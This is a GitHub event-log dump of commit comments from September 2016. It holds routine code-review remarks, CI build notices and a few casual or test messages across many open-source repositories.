{"id":"4539001979","type":"CommitCommentEvent","actor":{"login":"norjuliana"},"repo":{"name":"censof/ansible-deployment"},"payload":{"comment":{"id":18959888,"position":null,"line":null,"path":null,"commit_id":"48de7df31805bf3fc3fae6cea8d42cc8017ee39b","created_at":"2016-09-09T09:17:18Z","updated_at":"2016-09-09T09:17:18Z","body":"yes.i did read on this when you ask me to find out more about harakiri.\r\nhttps://emptyhammock.com/projects/info/pyweb/uwsgi.html\r\nhttps://moinmo.in/HowTo/NginxWithUwsgi"}},"created_at":"2016-09-09T09:17:18Z"}
{"id":"4539011330","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18959905,"position":386,"line":1351,"path":"src/ng/directive/ngModel.js","commit_id":"87a2ff76af5d0a9268d8eb84db5755077d27c84c","created_at":"2016-09-09T09:19:18Z","updated_at":"2016-09-09T09:19:18Z","body":"I was surprised you didn't use the controller's `$onInit` hook. This functionality seems a good fit for it.\r\n<sub>(Although you would still need `$scope` which would spoil the fun :disappointed:)</sub>"}},"created_at":"2016-09-09T09:19:18Z"}
{"id":"4539013156","type":"CommitCommentEvent","actor":{"login":"dmitrydi"},"repo":{"name":"dmitrydi/movie_pack"},"payload":{"comment":{"id":18959909,"position":43,"line":23,"path":"bin/netflix_do.rb","commit_id":"52d70611c59bc8eed04bec20012acbc282994437","created_at":"2016-09-09T09:19:46Z","updated_at":"2016-09-09T09:19:46Z","body":"Да, действительно. Вчера был нелегкий день, я в угаре что-то ваял))"}},"created_at":"2016-09-09T09:19:46Z"}
{"id":"4539013635","type":"CommitCommentEvent","actor":{"login":"joelittlejohn"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":18959911,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-09T09:19:53Z","updated_at":"2016-09-09T09:19:53Z","body":"This commit appears to have broken support for repeating parameters in clj-http.\r\n\r\nExample of this:\r\n\r\n```clj\r\n(http/get \"http://example.com\" {:query-params {:field [\"a\" \"b\" \"c\"]}})\r\n```\r\n\r\nshould produce:\r\n\r\nhttp://example.com?field=a&field=b&field=c\r\n\r\nbut instead now produces:\r\n\r\nhttp://example.com?field[0]=a&field[1]=b&field[2]=c\r\n\r\n@clyfe @dakrone should we revert this commit? Having no support for repeating parameters is a problem IMO."}},"created_at":"2016-09-09T09:19:53Z"}
{"id":"4539017227","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18959918,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-09T09:20:38Z","updated_at":"2016-09-09T09:20:38Z","body":"![Szeptember 9. - Péntek](http://ujlipot.vakvarju.com/data/napimenu/24.jpg?v=1473152597)\nGulyásleves\r\nRántott gombafejek jázminrizzsel, tartármártással\r\nTejbegríz fahéjjal"}},"created_at":"2016-09-09T09:20:38Z"}
{"id":"4539021387","type":"CommitCommentEvent","actor":{"login":"ZDDM"},"repo":{"name":"ZDDM/Time-lab"},"payload":{"comment":{"id":18959923,"position":null,"line":null,"path":null,"commit_id":"841bcbbf99f107fe495b2a6a380aadef99ef7021","created_at":"2016-09-09T09:21:33Z","updated_at":"2016-09-09T09:21:33Z","body":"This is literally a copy of Zack's commit. Pffft. What the fuck, git."}},"created_at":"2016-09-09T09:21:33Z"}
{"id":"4539026049","type":"CommitCommentEvent","actor":{"login":"jkcclemens"},"repo":{"name":"Feliix42/anybar-rs"},"payload":{"comment":{"id":18959931,"position":52,"line":144,"path":"src/lib.rs","commit_id":"f90baa35fda852fd2ca5b40cd908d845b9ed5347","created_at":"2016-09-09T09:22:32Z","updated_at":"2016-09-09T09:22:32Z","body":"Can replace this whole match block with `try!`."}},"created_at":"2016-09-09T09:22:32Z"}
{"id":"4539027433","type":"CommitCommentEvent","actor":{"login":"jkcclemens"},"repo":{"name":"Feliix42/anybar-rs"},"payload":{"comment":{"id":18959940,"position":91,"line":181,"path":"src/lib.rs","commit_id":"f90baa35fda852fd2ca5b40cd908d845b9ed5347","created_at":"2016-09-09T09:22:51Z","updated_at":"2016-09-09T09:22:51Z","body":"Also this one."}},"created_at":"2016-09-09T09:22:51Z"}
{"id":"4539035324","type":"CommitCommentEvent","actor":{"login":"mgellis91"},"repo":{"name":"mgellis91/Techdegree_PaginationAndFilter"},"payload":{"comment":{"id":18959953,"position":null,"line":null,"path":null,"commit_id":"27eca98f30c0ca24b701c145c7133088a70f9976","created_at":"2016-09-09T09:24:36Z","updated_at":"2016-09-09T09:24:36Z","body":"removed sub project commit"}},"created_at":"2016-09-09T09:24:36Z"}
{"id":"4539046004","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18959973,"position":null,"line":null,"path":null,"commit_id":"cd9b30597ffefe1868558abc9a0704e254828aff","created_at":"2016-09-09T09:26:58Z","updated_at":"2016-09-09T09:26:58Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#SmlgUjLHS4a05dHt6h_nZA"}},"created_at":"2016-09-09T09:26:58Z"}
{"id":"4539049403","type":"CommitCommentEvent","actor":{"login":"victornoel"},"repo":{"name":"petalslink/petals-bc-gateway"},"payload":{"comment":{"id":18959974,"position":null,"line":null,"path":null,"commit_id":"950a4ec69fdbc063987900fbedeef8f683339186","created_at":"2016-09-09T09:27:40Z","updated_at":"2016-09-09T09:27:40Z","body":"@cdeneux it's not the problem of the Gateway: in practice there is component in Petals that send Exchange with no operation specified. Anyway, this annotation is only there for the developper: it only is useful to ensure that when I call getOperation(), Eclipse (or Sonar) knows that operation can be null and prevent me writing code where I was not expecting it to be nullable.\r\n\r\nIf you want to put some check, this could go to the CDK or the router maybe."}},"created_at":"2016-09-09T09:27:40Z"}
{"id":"4539051333","type":"CommitCommentEvent","actor":{"login":"Ostico"},"repo":{"name":"matecat/MateCat"},"payload":{"comment":{"id":18959975,"position":26,"line":243,"path":"lib/Controller/API/V2/GlossariesController.php","commit_id":"9c2ffcdbe7e71f140c90b6e99ea80d32bcef4420","created_at":"2016-09-09T09:28:06Z","updated_at":"2016-09-09T09:28:06Z","body":"Cookie is sent to the browser, but not accepted without the domain name."}},"created_at":"2016-09-09T09:28:06Z"}
{"id":"4539052156","type":"CommitCommentEvent","actor":{"login":"baidan"},"repo":{"name":"baidan/test"},"payload":{"comment":{"id":18959976,"position":null,"line":null,"path":null,"commit_id":"13b307110a4c27986fd19bd5ad1b48369d574d35","created_at":"2016-09-09T09:28:15Z","updated_at":"2016-09-09T09:28:15Z","body":"地方"}},"created_at":"2016-09-09T09:28:15Z"}
{"id":"4539054728","type":"CommitCommentEvent","actor":{"login":"Mithrilou"},"repo":{"name":"Mithrilou/first-essai"},"payload":{"comment":{"id":18959979,"position":null,"line":null,"path":null,"commit_id":"dde0d7dc783a47e45b75e8f13b8a5b42e0e01961","created_at":"2016-09-09T09:28:50Z","updated_at":"2016-09-09T09:28:50Z","body":"This is a trial ?"}},"created_at":"2016-09-09T09:28:50Z"}
{"id":"4539055042","type":"CommitCommentEvent","actor":{"login":"esby"},"repo":{"name":"esby/RawTherapee"},"payload":{"comment":{"id":18959980,"position":8,"line":161,"path":"rtgui/toolpanel.cc","commit_id":"fd6b3b780591ee36f84fea4dec04d315f0673fe7","created_at":"2016-09-09T09:28:54Z","updated_at":"2016-09-09T09:28:54Z","body":"There is probably a better way, but now I fear such casts will be necessary. \r\nNow I don't believe they will be dangerous, \r\nsince the toolpanelAncestor is just a trick here and there is not going to be other children defined here..."}},"created_at":"2016-09-09T09:28:54Z"}
{"id":"4539057407","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":18959990,"position":5,"line":126,"path":"applet/src/menu.c","commit_id":"e216df55b50789ab87f720808f808600b75f9fbb","created_at":"2016-09-09T09:29:25Z","updated_at":"2016-09-09T09:29:25Z","body":"@sijskes why do you named it  item_conut ... on my known it is only enable and disable the menu line ...  \r\nsee 0x801274c on d02.032 ... the \"program radio\" entry is shown when the code plug this allowed."}},"created_at":"2016-09-09T09:29:25Z"}
{"id":"4539068671","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18960011,"position":null,"line":null,"path":null,"commit_id":"3ba98e3a90df0a5df35576c76a53dc9c4d2583cc","created_at":"2016-09-09T09:31:55Z","updated_at":"2016-09-09T09:31:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 975](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13007&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-09T09:31:55Z"}
{"id":"4539076606","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18960028,"position":74,"line":81,"path":"deps/fftw.mk","commit_id":"72402bad84e781ef6f66bab3e1e487c999718a6d","created_at":"2016-09-09T09:33:37Z","updated_at":"2016-09-09T09:33:37Z","body":"this doesn't work\r\n```\r\n$ make -C deps clean-fftw\r\nmake: Entering directory '/home/Tony/julia32/deps'\r\nrm scratch/fftw-3.3.5-%/build-compiled scratch/fftw-3.3.5-%/build-configured\r\nrm: cannot remove 'scratch/fftw-3.3.5-%/build-compiled': No such file or directory\r\nrm: cannot remove 'scratch/fftw-3.3.5-%/build-configured': No such file or directory\r\nmake: [/home/Tony/julia32/deps/fftw.mk:82: clean-fftw-single] Error 1 (ignored)\r\nmake -C scratch/fftw-3.3.5-% clean\r\nmake[1]: Entering directory '/home/Tony/julia32/deps'\r\nmake[1]: *** scratch/fftw-3.3.5-%: No such file or directory.  Stop.\r\nmake[1]: Leaving directory '/home/Tony/julia32/deps'\r\nmake: [/home/Tony/julia32/deps/fftw.mk:83: clean-fftw-single] Error 2 (ignored)\r\nrm scratch/fftw-3.3.5-%/build-compiled scratch/fftw-3.3.5-%/build-configured\r\nrm: cannot remove 'scratch/fftw-3.3.5-%/build-compiled': No such file or directory\r\nrm: cannot remove 'scratch/fftw-3.3.5-%/build-configured': No such file or directory\r\nmake: [/home/Tony/julia32/deps/fftw.mk:82: clean-fftw-double] Error 1 (ignored)\r\nmake -C scratch/fftw-3.3.5-% clean\r\nmake[1]: Entering directory '/home/Tony/julia32/deps'\r\nmake[1]: *** scratch/fftw-3.3.5-%: No such file or directory.  Stop.\r\nmake[1]: Leaving directory '/home/Tony/julia32/deps'\r\nmake: [/home/Tony/julia32/deps/fftw.mk:83: clean-fftw-double] Error 2 (ignored)\r\nmake: Leaving directory '/home/Tony/julia32/deps'\r\n```"}},"created_at":"2016-09-09T09:33:37Z"}
{"id":"4539083705","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18960043,"position":null,"line":null,"path":null,"commit_id":"48947f2bebb4a2c8822d511feafa13a41f5f0330","created_at":"2016-09-09T09:35:10Z","updated_at":"2016-09-09T09:35:10Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32434/testReport/) for this commit**"}},"created_at":"2016-09-09T09:35:10Z"}
{"id":"4539089205","type":"CommitCommentEvent","actor":{"login":"artemohanjanyan"},"repo":{"name":"dendi239/Haskell"},"payload":{"comment":{"id":18960055,"position":6,"line":21,"path":"Nat.hs","commit_id":"4a2f8d30292b5017b4253b3fd68b0953824b60a8","created_at":"2016-09-09T09:36:22Z","updated_at":"2016-09-09T09:36:22Z","body":"В чём глубокий смысл пробела?"}},"created_at":"2016-09-09T09:36:22Z"}
{"id":"4539089885","type":"CommitCommentEvent","actor":{"login":"hsluoyz"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18960056,"position":13,"line":23,"path":"installer/Deploy.ps1","commit_id":"d99a3ceaef5412688e1ec71872c4a32b29f9a23f","created_at":"2016-09-09T09:36:30Z","updated_at":"2016-09-09T09:36:30Z","body":"What's wrong here?"}},"created_at":"2016-09-09T09:36:30Z"}
{"id":"4539102093","type":"CommitCommentEvent","actor":{"login":"IIvec"},"repo":{"name":"IIvec/Stockfish"},"payload":{"comment":{"id":18960092,"position":null,"line":null,"path":null,"commit_id":"362c88db4ba0474effb6a7db1b4de137ea82b866","created_at":"2016-09-09T09:39:10Z","updated_at":"2016-09-09T09:39:10Z","body":"@pb00068: I actually think that the optimal solution is when rows of length n are used by 2^(n-1) threads, but I'll test this when we'll all have 16+ cores. No hard feelings, and I'll stop the test."}},"created_at":"2016-09-09T09:39:10Z"}
{"id":"4539102981","type":"CommitCommentEvent","actor":{"login":"stefaniacardenas"},"repo":{"name":"alanjc7/lessons"},"payload":{"comment":{"id":18960093,"position":18,"line":18,"path":"variables.rb","commit_id":"b235ff719467b0ec82525cb47cb1d828113d422f","created_at":"2016-09-09T09:39:22Z","updated_at":"2016-09-09T09:39:22Z","body":"Don't forget to add a space between the variable and the operator,  ie  `sandwich_number * sandwich_calories + drinks_number * drinks_calories`"}},"created_at":"2016-09-09T09:39:22Z"}
{"id":"4539104495","type":"CommitCommentEvent","actor":{"login":"stefaniacardenas"},"repo":{"name":"alanjc7/lessons"},"payload":{"comment":{"id":18960095,"position":32,"line":32,"path":"variables.rb","commit_id":"b235ff719467b0ec82525cb47cb1d828113d422f","created_at":"2016-09-09T09:39:41Z","updated_at":"2016-09-09T09:39:41Z","body":"Same here"}},"created_at":"2016-09-09T09:39:41Z"}
{"id":"4539109229","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":18960103,"position":5,"line":126,"path":"applet/src/menu.c","commit_id":"e216df55b50789ab87f720808f808600b75f9fbb","created_at":"2016-09-09T09:40:40Z","updated_at":"2016-09-09T09:40:40Z","body":"because it is. you should trace some more into the contacts list, or zone list."}},"created_at":"2016-09-09T09:40:40Z"}
{"id":"4539112315","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18960106,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-09T09:41:19Z","updated_at":"2016-09-09T09:41:19Z","body":"上記、ご説明ありがとうございます！\r\nご指示頂いたように修正した所、下記のようなエラーになりました。\r\nこれで正常に動いているということですね！\r\n\r\nいずれにしても、 throw new Exceptionについては実際に動かす段になったら削除しておく必要があるということですね。\r\n\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18382647/dbba2934-76bc-11e6-94a4-7240ab84c45d.png)\r\n"}},"created_at":"2016-09-09T09:41:19Z"}
{"id":"4539112587","type":"CommitCommentEvent","actor":{"login":"vgrigoriu"},"repo":{"name":"g-un--/fsharpscripts"},"payload":{"comment":{"id":18960107,"position":31,"line":31,"path":"freeCalc.fsx","commit_id":"b277e569af44c0f0933b3e77b020be16cd2870f3","created_at":"2016-09-09T09:41:23Z","updated_at":"2016-09-09T09:41:23Z","body":"Asta pare a fi miezul, nu? E ceva magie? Ce înseamnă sintaxa cu `let!`?"}},"created_at":"2016-09-09T09:41:23Z"}
{"id":"4539113523","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18960111,"position":null,"line":null,"path":null,"commit_id":"6c618792cc30e76c309017dee422be14e3a76533","created_at":"2016-09-09T09:41:36Z","updated_at":"2016-09-09T09:41:36Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32435/testReport/) for this commit**"}},"created_at":"2016-09-09T09:41:36Z"}
{"id":"4539114858","type":"CommitCommentEvent","actor":{"login":"vgrigoriu"},"repo":{"name":"g-un--/fsharpscripts"},"payload":{"comment":{"id":18960116,"position":18,"line":18,"path":"freeCalc.fsx","commit_id":"b277e569af44c0f0933b3e77b020be16cd2870f3","created_at":"2016-09-09T09:41:52Z","updated_at":"2016-09-09T09:41:52Z","body":"Adică cum?"}},"created_at":"2016-09-09T09:41:52Z"}
{"id":"4539115466","type":"CommitCommentEvent","actor":{"login":"baidan"},"repo":{"name":"baidan/test"},"payload":{"comment":{"id":18960118,"position":null,"line":null,"path":null,"commit_id":"e2964ecc4805383724c3580ad68c09f8374ea988","created_at":"2016-09-09T09:42:00Z","updated_at":"2016-09-09T09:42:00Z","body":"法国恢复规划"}},"created_at":"2016-09-09T09:42:00Z"}
{"id":"4539115820","type":"CommitCommentEvent","actor":{"login":"baidan"},"repo":{"name":"baidan/test"},"payload":{"comment":{"id":18960119,"position":null,"line":null,"path":null,"commit_id":"e2964ecc4805383724c3580ad68c09f8374ea988","created_at":"2016-09-09T09:42:05Z","updated_at":"2016-09-09T09:42:05Z","body":"法规和法国"}},"created_at":"2016-09-09T09:42:05Z"}
{"id":"4539119795","type":"CommitCommentEvent","actor":{"login":"alim0x"},"repo":{"name":"alim0x/allofu-ghost-theme"},"payload":{"comment":{"id":18960124,"position":null,"line":null,"path":null,"commit_id":"ff76912abdffe4ed629991f8dd9d57003b7a33d0","created_at":"2016-09-09T09:42:55Z","updated_at":"2016-09-09T09:42:55Z","body":"Thanks to @frantic1048 ; )"}},"created_at":"2016-09-09T09:42:55Z"}
{"id":"4539124133","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18960132,"position":null,"line":null,"path":null,"commit_id":"3ba98e3a90df0a5df35576c76a53dc9c4d2583cc","created_at":"2016-09-09T09:43:51Z","updated_at":"2016-09-09T09:43:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 975](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13007&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:11:56"}},"created_at":"2016-09-09T09:43:51Z"}
{"id":"4539129099","type":"CommitCommentEvent","actor":{"login":"mtrabelsi"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18960137,"position":5,"line":107,"path":"application/src/main/webapp/js/desktopNotification.js","commit_id":"73e7712390b7b0e79dd02fbc69c6e24973d599aa","created_at":"2016-09-09T09:44:54Z","updated_at":"2016-09-09T09:44:54Z","body":"The DB structure changed but not how the keywords are saved, I thought we're waiting for Trong?"}},"created_at":"2016-09-09T09:44:54Z"}
{"id":"4539131032","type":"CommitCommentEvent","actor":{"login":"IvenMax"},"repo":{"name":"IvenMax/TimeTextView"},"payload":{"comment":{"id":18960143,"position":null,"line":null,"path":null,"commit_id":"770ddb9067355664f116da186e331c193bf5c255","created_at":"2016-09-09T09:45:20Z","updated_at":"2016-09-09T09:45:20Z","body":"2016年9月9日 17:43:25---添加倒计时结束监听事件处理，常见方法可参考MainActivity中的设置<br>\r\n技术有限，望大家改进~"}},"created_at":"2016-09-09T09:45:20Z"}
{"id":"4539135334","type":"CommitCommentEvent","actor":{"login":"IvenMax"},"repo":{"name":"IvenMax/TimeTextView"},"payload":{"comment":{"id":18960148,"position":3,"line":3,"path":"README.md","commit_id":"770ddb9067355664f116da186e331c193bf5c255","created_at":"2016-09-09T09:46:16Z","updated_at":"2016-09-09T09:46:16Z","body":"2016年9月9日 17:43:25---添加倒计时结束监听事件处理，常见方法可参考MainActivity中的设置\r\n\r\n技术有限，望大家批评改进~"}},"created_at":"2016-09-09T09:46:16Z"}
{"id":"4539136482","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-qt"},"payload":{"comment":{"id":18960152,"position":16,"line":566,"path":"TelepathyQt/base-channel.cpp","commit_id":"03f72590057f84ba39b54d5f8809e07b1846ec4c","created_at":"2016-09-09T09:46:30Z","updated_at":"2016-09-09T09:46:30Z","body":"I just found why I used foreach. Different projects have different styles and requirements, you know, and I think I did it because I \"felt\" that it is right in this context. Because we have 17 ! plain \"foreach\" usages in this file. E.g. [plain \"foreach\" five lines above](https://github.com/TelepathyQt/telepathy-qt/commit/03f72590057f84ba39b54d5f8809e07b1846ec4c#diff-951475c1d5512daac2b7d900315718c3R54), introduced in 2013.\r\n\r\nBoom."}},"created_at":"2016-09-09T09:46:30Z"}
{"id":"4539137100","type":"CommitCommentEvent","actor":{"login":"zwliew"},"repo":{"name":"CyanogenMod/android_device_samsung_serrano-common"},"payload":{"comment":{"id":18960154,"position":null,"line":null,"path":null,"commit_id":"2d7db29707ed70e925be719ac3330fc7628d9ffa","created_at":"2016-09-09T09:46:38Z","updated_at":"2016-09-09T09:46:38Z","body":"I'm not exactly sure either, but I (think that) I found that native_agps_set_ref_location_cellid accepts 6 arguments rather than AOSP's 5."}},"created_at":"2016-09-09T09:46:38Z"}
{"id":"4539138774","type":"CommitCommentEvent","actor":{"login":"vmaksymiv"},"repo":{"name":"ivanromakh/openprocurement.tender.limited"},"payload":{"comment":{"id":18960155,"position":11,"line":31,"path":"openprocurement/tender/limited/models.py","commit_id":"7ac264482d31fc50984cfe77f609ee8fe2c2d53f","created_at":"2016-09-09T09:47:01Z","updated_at":"2016-09-09T09:47:01Z","body":"Старайтесь дотримуватись стандартів оформлення коду. Use 4 spaces per indentation level. https://www.python.org/dev/peps/pep-0008/#indentation"}},"created_at":"2016-09-09T09:47:01Z"}
{"id":"4539140873","type":"CommitCommentEvent","actor":{"login":"tfonji"},"repo":{"name":"tfonji/tembongfonjiblog"},"payload":{"comment":{"id":18960159,"position":null,"line":null,"path":null,"commit_id":"33876d29e4e7555913d15ab2f2ce83cdee1738fd","created_at":"2016-09-09T09:47:27Z","updated_at":"2016-09-09T09:47:27Z","body":"Edit: moved styles.css, not main.css, to templates folder. deleted css folder."}},"created_at":"2016-09-09T09:47:27Z"}
{"id":"4539143479","type":"CommitCommentEvent","actor":{"login":"macite"},"repo":{"name":"splashkit/splashkit"},"payload":{"comment":{"id":18960164,"position":300,"line":862,"path":"coresdk/src/coresdk/animations.cpp","commit_id":"f745254ea321dc4d060a7e0b2fef24b5bea90821","created_at":"2016-09-09T09:48:01Z","updated_at":"2016-09-09T09:48:01Z","body":":) or you could delete it from the header. I thought I searched the header, but must have missed it."}},"created_at":"2016-09-09T09:48:01Z"}
{"id":"4539144043","type":"CommitCommentEvent","actor":{"login":"Dyz2017"},"repo":{"name":"Dyz2017/Dyz"},"payload":{"comment":{"id":18960166,"position":null,"line":null,"path":null,"commit_id":"3e583b89f2315e385a5af1aeeeba5237aac31e5e","created_at":"2016-09-09T09:48:10Z","updated_at":"2016-09-09T09:48:10Z","body":"\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\">\r\n<head>\r\n\t<meta http-equiv=\"Content-Type\" content=\"text/html;charset=UTF-8\">\r\n\t<title>Document</title>\r\n<style>\r\n\t.text-center{\r\n  \t\ttext-align:center;\r\n\t}\r\n\timg{\r\n  \t\twidth:90%;\r\n\t}\r\n\tbody{\r\n\t\tmargin-top: 60px;\r\n\t\tpadding-left: \r\n\t}\r\n\tp{\r\n\t\tfont-size: 25px;\r\n\t}\r\n</style>\r\n</head>\r\n<body>\r\n<div class=\"col-sm-10\" style=\"background-color:#d3d3d3;\">\r\n  <h1 class=\"text-center\" style=\"font-size:60px;\">Mr.Dyz \r\nPersonal introduction</h1>\r\n  <h2 class=\"text-center\"><em>A man who is too poor to find a job</em></h2>\r\n  <div class=\"text-center\" ><img src=\"http://himg2.huanqiu.com/attachment2010/2014/0325/20140325043830545.jpg\">\r\n    <div><i>In me the tiger sniffs the rose.</i></div>   \r\n</div>\r\n     <div>\r\n         <ul>\r\n         \t<li><p><strong>1992</strong>-Born in China Guangdong province.</p></li>\r\n            <li><p><strong>2015</strong>-Graduated form SXAU. A very beautiful school in my mind. In spring, the school is full of flowers. </p></li>\r\n\t\t\t<li><p><strong>2016</strong>-The first job in Foshan City as an Agricultural technician. Now self-learning Front end at home. I need a job to learning more and improve myself.</p></li>\r\n         </ul>\r\n     </div>\r\n     <div><p>If you want me , call me in <strong><a style=\"text-decoration:none; color:green;\" href=\"https://wx.qq.com/?&lang=zh_CN\" title=\"Go to WeChat\" target=\"_Blank\">WeChat</a> :ai124424514</strong> ^o^</p></div>\r\n  </div>\t\r\n</body>\r\n</html>"}},"created_at":"2016-09-09T09:48:10Z"}
{"id":"4539144361","type":"CommitCommentEvent","actor":{"login":"wojustme"},"repo":{"name":"wojustme/wifi-front"},"payload":{"comment":{"id":18960168,"position":null,"line":null,"path":null,"commit_id":"e6c19d4b6d98dbff3a85c676171ee5a30ffe2427","created_at":"2016-09-09T09:48:13Z","updated_at":"2016-09-09T09:48:13Z","body":"修改地图bug"}},"created_at":"2016-09-09T09:48:13Z"}
{"id":"4539146657","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/chorus"},"payload":{"comment":{"id":18960174,"position":null,"line":null,"path":null,"commit_id":"d475f2bf8839ccbb75f187127965b976a88563e9","created_at":"2016-09-09T09:48:43Z","updated_at":"2016-09-09T09:48:43Z","body":"TeamCity Chorus :: chorus-win32-master Continuous [Build 2.6.267.d475f2bf8839ccbb75f187127965b976a88563e9](http://build.palaso.org/viewLog.html?buildId=76771&buildTypeId=bt2) outcome was **SUCCESS**\nSummary: Tests passed: 949, ignored: 50 Build time: 00:28:07"}},"created_at":"2016-09-09T09:48:43Z"}
{"id":"4539156135","type":"CommitCommentEvent","actor":{"login":"alexcu"},"repo":{"name":"splashkit/splashkit"},"payload":{"comment":{"id":18960194,"position":300,"line":862,"path":"coresdk/src/coresdk/animations.cpp","commit_id":"f745254ea321dc4d060a7e0b2fef24b5bea90821","created_at":"2016-09-09T09:50:46Z","updated_at":"2016-09-09T09:50:46Z","body":"My bad! Thought it was odd that there was no implementation for it 😊 I'll get rid of it. \n\nSent from my iPhone\n\n> On 9 Sep 2016, at 7:48 PM, Andrew Cain <notifications@github.com> wrote:\n> \n> :) or you could delete it from the header. I thought I searched the header, but must have missed it.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-09T09:50:46Z"}
{"id":"4539157248","type":"CommitCommentEvent","actor":{"login":"samaaron"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":18960197,"position":null,"line":null,"path":null,"commit_id":"1e797ac7fb72ed4eebf468bb2871e05a82cc9c76","created_at":"2016-09-09T09:51:02Z","updated_at":"2016-09-09T09:51:02Z","body":"Yep - and this is also a pre-cursor for users being able to select which input/outputs to use directly from the GUI (rather than using system defaults)"}},"created_at":"2016-09-09T09:51:02Z"}
{"id":"4539158293","type":"CommitCommentEvent","actor":{"login":"emminizer"},"repo":{"name":"gwaldron/osgearth"},"payload":{"comment":{"id":18960199,"position":null,"line":null,"path":null,"commit_id":"10b42b791ebc541b547e3a07c0c58cd0f373a2c7","created_at":"2016-09-09T09:51:16Z","updated_at":"2016-09-09T09:51:16Z","body":"This change requires flags around testing for Linux.  Perhaps something like:\r\nfind_package(X11)\r\nif(X11_FOUND)\r\n    target_link_libraries(osgearth_qt_windows X11)\r\nendif()\r\n\r\nOr:\r\nfind_package(X11)\r\nif(X11_FOUND)\r\n    list(APPEND TARGET_ADDED_LIBRARIES X11)\r\nendif()\r\n\r\nFor whatever reason, although I regularly build this on Linux, I do not require the X11 link explicitly against Qt 5.5.1 with CMake 3.x."}},"created_at":"2016-09-09T09:51:16Z"}
{"id":"4539160308","type":"CommitCommentEvent","actor":{"login":"macite"},"repo":{"name":"splashkit/splashkit"},"payload":{"comment":{"id":18960202,"position":300,"line":862,"path":"coresdk/src/coresdk/animations.cpp","commit_id":"f745254ea321dc4d060a7e0b2fef24b5bea90821","created_at":"2016-09-09T09:51:44Z","updated_at":"2016-09-09T09:51:44Z","body":"Equally my fault :) I missed it in the header."}},"created_at":"2016-09-09T09:51:44Z"}
{"id":"4539160313","type":"CommitCommentEvent","actor":{"login":"okokookokok"},"repo":{"name":"Kjagd/dotarun"},"payload":{"comment":{"id":18960201,"position":null,"line":null,"path":null,"commit_id":"b9c8d370733a75d1bd5dc997a10bb3312be6bafc","created_at":"2016-09-09T09:51:44Z","updated_at":"2016-09-09T09:51:44Z","body":"Just wait a frame you f.. God dammit "}},"created_at":"2016-09-09T09:51:44Z"}
{"id":"4539166762","type":"CommitCommentEvent","actor":{"login":"Globegitter"},"repo":{"name":"graphql-python/graphql-core"},"payload":{"comment":{"id":18960217,"position":4,"line":665,"path":"graphql/language/parser.py","commit_id":"1d36c1cffcc19a55f622b8ceac7000257763d2b4","created_at":"2016-09-09T09:53:15Z","updated_at":"2016-09-09T09:53:15Z","body":"Whoops thank you for catching that @syrusakbary. This is one of my 'typical' debugging variable names."}},"created_at":"2016-09-09T09:53:15Z"}
